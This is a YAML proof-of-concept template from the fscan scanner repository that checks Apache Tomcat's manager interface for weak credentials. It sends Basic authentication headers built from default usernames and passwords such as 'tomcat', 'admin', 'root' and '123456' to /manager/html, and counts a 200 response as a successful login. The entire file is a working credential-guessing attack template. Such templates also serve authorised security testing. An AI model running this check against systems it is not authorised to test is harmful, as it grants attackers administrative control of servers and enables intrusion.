fscan/WebScan/pocs/tomcat-manager-weak.yml
canc3s 3d3ecac605 add weblogic-console-weak
add weblogic-console-weak
2021-06-21 17:22:27 +08:00

32 lines
725 B
YAML

name: poc-yaml-tomcat-manager-weak
sets:
username:
- tomcat
- admin
- root
- manager
password:
- ""
- admin
- tomcat
- 123456
- root
payload:
- base64(username+":"+password)
rules:
- method: GET
path: /manager/html
follow_redirects: false
expression: |
response.status == 401 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager")
- method: GET
path: /manager/html
headers:
Authorization: Basic {{payload}}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager")
detail:
author: shadown1ng(https://github.com/shadown1ng)